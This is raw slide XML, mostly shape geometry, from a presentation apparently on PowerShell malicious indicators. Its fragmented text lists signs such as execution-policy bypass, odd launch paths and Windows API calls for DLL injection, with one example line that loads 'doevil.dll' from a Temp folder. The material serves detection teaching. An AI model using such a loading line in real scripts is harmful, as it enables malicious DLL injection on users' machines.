                  <a:lnTo>
                    <a:pt x="78231" y="0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015744" y="3226054"/>
            <a:ext cx="656780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Bypass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ng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ex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cutio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policy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ca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ac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di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15744" y="2374137"/>
            <a:ext cx="212598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65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ex</a:t>
            </a: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cutio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>policy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847469" y="4130421"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="4130421"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="4607814"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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869186" y="4139946"/>
              <a:ext cx="4319270" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="467995">
                  <a:moveTo>
                    <a:pt x="4241038" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312886" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296171" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271385" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4241038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869186" y="4139946"/>
              <a:ext cx="4319270" cy="467995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="467995">
                  <a:moveTo>
                    <a:pt x="77977" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4241038" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271385" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296171" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312886" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="467867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="77977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6129" y="47630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22844" y="22844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47630" y="6129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="0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2015744" y="4977841"/>
            <a:ext cx="1041781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Using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system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calls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Windows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API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might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indicate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attempt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inject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DLL.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52320" y="4206316"/>
            <a:ext cx="171323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4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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>dows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>API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199132" y="6220980"/>
            <a:ext cx="11751945" cy="1231900"/>
            <a:chOff x="2199132" y="6220980"/>
            <a:chExt cx="11751945" cy="1231900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3996" y="6220980"/>
              <a:ext cx="11696700" cy="123137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99132" y="6556273"/>
              <a:ext cx="10782300" cy="64767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305812" y="6271260"/>
              <a:ext cx="11572240" cy="1108075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11572240" h="1108075">
                  <a:moveTo>
                    <a:pt x="11571732" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1107947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11571732" y="1107947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11571732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305812" y="6271260"/>
              <a:ext cx="11572240" cy="1108075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11572240" h="1108075">
                  <a:moveTo>
                    <a:pt x="0" y="1107947"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11571732" y="1107947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11571732" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1107947"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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2385186" y="6636766"/>
            <a:ext cx="103892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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\Temp\doevil.dll")</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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235707" y="6150902"/>
            <a:ext cx="11734800" cy="1324610"/>
            <a:chOff x="2235707" y="6150902"/>
            <a:chExt cx="11734800" cy="1324610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35707" y="6150902"/>
              <a:ext cx="11734800" cy="23783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281427" y="6196583"/>
              <a:ext cx="11620500" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11620500" h="123825">
                  <a:moveTo>
                    <a:pt x="11586591" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33909" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20681" y="2655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9906" y="9906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655" y="20681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="123444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11620500" y="123444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11620500" y="33909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11617844" y="20681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11610594" y="9906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11599818" y="2655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11586591" y="0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35707" y="7333487"/>
              <a:ext cx="11734800" cy="14173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281427" y="7379208"/>
              <a:ext cx="11620500" cy="27940"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11620500" h="27940">
                  <a:moveTo>
                    <a:pt x="11620499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11620499" y="27432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11620499" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D3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96915" y="306451"/>
            <a:ext cx="566420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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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36364" y="760476"/>
            <a:ext cx="7438644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050160" y="3822572"/>
            <a:ext cx="12563475" cy="2630170"/>
            <a:chOff x="2050160" y="3822572"/>
            <a:chExt cx="12563475" cy="2630170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2071877" y="3832097"/>
              <a:ext cx="4320540" cy="661670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="661670">
                  <a:moveTo>
                    <a:pt x="4210304" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="110236" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67347" y="8669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32305" y="32305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8669" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="661415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="661415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311870" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4288234" y="32305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4253192" y="8669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4210304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071877" y="3832097"/>
              <a:ext cx="4320540" cy="661670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="661670">
                  <a:moveTo>
                    <a:pt x="110236" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4210304" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4253192" y="8669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4288234" y="32305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311870" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="661415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="661415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="110236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8669" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32305" y="32305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67347" y="8669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110236" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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059685" y="4301489"/>
              <a:ext cx="12544425" cy="2141220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2141220">
                  <a:moveTo>
                    <a:pt x="12368148" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175894" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129131" y="6282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87112" y="24012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51514" y="51514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24012" y="87112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6282" y="129131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1965325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6282" y="2012088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24012" y="2054107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51514" y="2089705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87112" y="2117207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129131" y="2134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175894" y="2141220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12368148" y="2141220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12414912" y="2134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456931" y="2117207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12492529" y="2089705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520031" y="2054107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537761" y="2012088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1965325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="175895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537761" y="129131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520031" y="87112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12492529" y="51514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456931" y="24012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12414912" y="6282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123681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059685" y="4301489"/>
              <a:ext cx="12544425" cy="2141220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2141220">
                  <a:moveTo>
                    <a:pt x="0" y="175895"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6282" y="129131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24012" y="87112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51514" y="51514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87112" y="24012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129131" y="6282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175894" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12368148" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12414912" y="6282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456931" y="24012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12492529" y="51514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520031" y="87112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537761" y="129131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="175895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1965325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537761" y="2012088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12520031" y="2054107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12492529" y="2089705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456931" y="2117207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12414912" y="2134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12368148" y="2141220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175894" y="2141220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129131" y="2134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87112" y="2117207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51514" y="2089705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24012" y="2054107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6282" y="2012088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1965325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175895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2051685" y="1948052"/>
            <a:ext cx="4338320" cy="546735"/>
            <a:chOff x="2051685" y="1948052"/>
            <a:chExt cx="4338320" cy="546735"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2061210" y="1957577"/>
              <a:ext cx="4319270" cy="527685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="527685">
                  <a:moveTo>
                    <a:pt x="4231132" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87883" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53685" y="6909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25749" y="25749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6909" y="53685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="87883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="527303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="527303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="87883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312106" y="53685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293266" y="25749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4265330" y="6909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4231132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061210" y="1957577"/>
              <a:ext cx="4319270" cy="527685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="527685">
                  <a:moveTo>
                    <a:pt x="87883" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4231132" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4265330" y="6909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293266" y="25749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312106" y="53685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="87883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="527303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="527303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="87883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6909" y="53685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25749" y="25749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53685" y="6909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87883" y="0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2244344" y="1991614"/>
            <a:ext cx="28854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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Launching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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>PowerShell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039492" y="2417445"/>
            <a:ext cx="12563475" cy="1099820"/>
            <a:chOff x="2039492" y="2417445"/>
            <a:chExt cx="12563475" cy="1099820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049017" y="2426970"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455270" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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049017" y="2426970"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88773"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="88773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455270" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88773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2244344" y="2845054"/>
            <a:ext cx="8904605" cy="3197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Launching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PowerShell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from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different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script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type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suspicious.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500">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="23495">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Powe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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5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2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>el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5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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ag</a:t>
            </a:r>
            <a:r>
